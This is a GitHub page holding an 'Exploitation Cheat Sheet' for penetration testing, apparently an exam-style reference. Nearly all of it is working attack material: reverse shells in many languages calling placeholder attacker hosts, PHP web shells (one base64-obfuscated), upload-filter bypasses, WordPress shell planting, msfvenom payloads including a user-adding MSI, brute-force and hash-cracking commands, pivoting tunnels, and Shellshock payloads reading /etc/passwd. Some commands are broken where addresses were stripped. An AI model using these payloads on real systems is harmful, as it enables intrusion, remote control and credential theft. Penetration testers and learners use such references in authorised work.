Skip to content
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
417 lines (243 sloc) 11.9 KB

Exploitation Cheat Sheet

Reverse Shells


nc -e /bin/bash IPADDRESS PORT
nc -c /bin/bash IPADDRESS PORT

Netcat no -e or -c

rm -f /var/tmp/backpipe 
mknod /var/tmp/backpipe p
nc IPADDRESS PORT 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe


bash -i >& /dev/tcp/ 0>&1


perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'



python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

#UDP-use socat UDP listener

python -c 'import socket,pty,os;lhost = ""; lport = 100; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE",'/dev/null'); pty.spawn("/bin/bash"); s.close();


ruby -rsocket -e'"",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'



socat file:`tty`,raw,echo=0 tcp-listen:4444


socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:

#UDP Listener

socat file:`tty`,echo=0,raw  udp-listen:100


# Using Telnet and a created node

mknod /var/tmp/backpipe p; telnet 53 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe

# Using Telnet and Telnet

telnet 53 | /bin/bash | telnet 54

OpenSSL Encrypted Reverse Shell

# Generate certificate:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Listener: 

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

# Reverse Shell:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

Upgrade Reverse Shell to Support tab completion/hot keys

# In reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'

# In Kali
stty raw -echo

# In reverse shell-optional
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>


# PHP reverse shell
php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# Simple PHP shell.php
<?php echo shell_exec("bash -i >& /dev/tcp/ 0>&1");?>

#PHP popen
<?php popen("(nc -nv $_GET[0] 443 -e /bin/bash)2>&1","r"); ?>

#PHP fsockopen
<?php fsockopen("", 443);`/bin/sh -i <&3 >&3 2>&3`; ?>

#PHP Reverse Shell with Base64
<?php shell_exec(base64_decode("cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTEuMC41MyI7JHA9MTIzNDtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsn"))?>

PAYLOAD: <?=`$_GET[0]`?>

PAYLOAD: <?=$_GET[0]($_POST[1]);?>
URL: -d 1=id

PAYLOAD: <?php export($_GET); $a($b)?>

PAYLOAD: <?php system($_GET["cmd"]); ?>

PAYLOAD: <?php shell_exec(base64_decode($_GET["cmd"])) ?>


Reverse Shell

This attack requires having credentials on both machines, and can be used for NAT-ed environments.
#Executed on remote host.
ssh -NR 60000:localhost:22 user@
#Executed on attacking machine.
ssh user@localhost -p 60000

Have SSH execute a command before the remote shell is loaded

ssh user@ -t "/bin/sh"

Try to get SSH to not load the shell's rc file

ssh user@ -t "bash --noprofile"


ssh user@ -t "() { :; }; /bin/bash"

File Transfers

php ftp sequence to transfer netcat on linux

<?php echo shell_exec("echo open 21>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo user offsec lab>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo get netcat /usr/local/databases/netcat>>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye>> /usr/local/databases/ftp.txt");?>

<?php echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>

Windows FTP via text file

echo open 21> ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt


echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

TFTP, usually enabled by default in Server 2003, XP, and below

Start tftp server on Kali
aftpd start

Transfer files from Kali to Windows (from windows terminal)
tftp -I IPADDRESS GET nameoffile.exe


fetch http://IPADDRESS/filename

Command Injection

command1 && command2 that will run command2 if command1 succeeds.

command1 || command2 that will run command2 if command1 fails.

command1 ; command2 that will run command1 then command2.

command1 | command2 that will run command1 and send the output of command1 to command2


# Windows

Bypassing File Uploads

# Bypass client side checking
Submit Request through burp and change file extension with intercept from .jpg back to .php

# Double Extension Injection

# Invalid Extension Bypass

#Bypass Content-Type Verification
Intercept in burp and change Content-Type to image/gif, image/jpg, or image/png

# Null byte Injection

Or edit the hex in the request in burp to 00

# Upload .htaccess
# Example .htaccess contains: AddType application/x-httpd-php .jpg
# This instructs Apache to run .jpg files as php, then upload malicious jpg

# Bypass blacklists
PHP, pHp, PhP, pHP, php3, php4, php5, php7, phtml, etc

# Content Length Bypass
Use a small payload: <?system($_GET[0]);
Or fill file with lots of junk 

# Image Header in File

Word Press

Once logged into the interface try to get reverse shell by either editing an existing theme, uploading a new theme, or uploading a new plugin.

Editing a theme, paste in your own reverse shell code and browse to it, normally it's under http://IPADDRESS/wp-content/themes/nameoftheme/page.php

If uploading as a plugin, make sure the shell.php file has the appropriate plugin comments or it will "fail" when uploading. Comments should look like this:
	    Plugin Name: WordPress Shell
	    Plugin URI:
	    Description: blah blah
	    Author: Hackerman
	    Version: 0.2
	    Author URI:
	Then browse to the plugin page, normally: http://IPADDRESS/wp-content/plugins/shell/shell.php

Generating Payloads

PHP reverse shell payload

msfvenom -p php/reverse_php LHOST=YOURIPADDRESS LPORT=443 > shell.php

Windows reverse shellcode for python script buffer overflow

msfvenom -p windows/shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f c -e x86/alpha_mixed -b "\x00\x04\xcd\x77\x3f"

Windows bind shellcode for python script buffer overflow

msfvenom -p windows/shell_bind_tcp LPORT=444 -f c -e x86/shikata_ga_nai -b  "\x00\x04\xcd\x77\x3f"

Meterpreter exe with reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOURIPADDRESS LPORT=4444 -f exe > meterpreter.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > met64.exe

WAR file for Apache Tomcat.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f war > shell.war

to find malicious js file extract shell.war then browse to js file in browser
jar -xvf shell.war

Windows MSI

msfvenom -f msi-nouac -p windows/adduser USER=hackerman PASS=password -o add_user.msi


msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -f js_le

Linux elf binary

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -b "\x00" -f elf -o filename

Brute Forcing


hydra -l sa -P /usr/share/wordlists/rockyou.txt IPADDRESS mssql

medusa -h IPADDRESS -u sa -P /usr/share/wordlists/rockyou.txt -e nsr -m mssql -nPORTNUMBER


ncrack -u administrator -P /usr/share/wordlists/rockyou.txt -p 3389 IPADDRESS


hydra -l root -P /usr/share/wordlists/rockyou.txt IPADDRESS ssh

medusa -h IPADDRESS -u root -P /usr/share/wordlists/rockyou.txt -e nsr -m ssh

Word Press

hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form"/wp-login.php:log=^USER^&pwd=^PASS^:S=Location\:.*/wp-admin/" -e nsr


hydra -l admin -P /usr/share/wordlists/rockyout.txt IPADDRESS -e nsr ftp 


hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form "/login.php:username=^USER^&password=^PASS^:FAILMESSAGE" -e nsr

Password Cracking

hashcat -m 1800 -a 0 -o hashes.txt --remove hashes.txt rockyou.txt

Identify hashes


SSH passphrase

ssh2john id_rsa  > sshtocrack
john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack

SSH tunnels and Port Forwarding

Port forward with plink on Windows

plink.exe -l root -R 445: YOURIPADDRESS

Meterpreter port forward

portfwd add -l 9090 -p 9090 -r TARGETIP 

create dynamic ssh tunnel over port for use with proxychains

ssh -f -N -D 8080 root@IPADDRESS

Proxychains to open up another SSH tunnel through pivot machine hopping

proxychains4 ssh -f -N -D 8090 hackerman@ -p 222

Send reverse ssh tunnel to your machine

ssh -R 8090:localhost:8090 YOURIPADDRESS


() { :; };

Reverse shell

()  { :; }; /bin/bash -c /bin/bash -i  >& /dev/tcp/YOURIPADDRESS/PORT 0>&1 &
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80

Buffer Overflow

Generate unique pattern using metasploit module

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Find unique pattern that EIP displays

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 42376942

Check for bad chars, insert into script then check debugger for any breaks in sequence

badchars = ( 
 "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

Find JMP ESP address ("\xff\xe4") using in debugger

!mona find -s "\xff\xe4" -m nameofprogram.dll
You can’t perform that action at this time.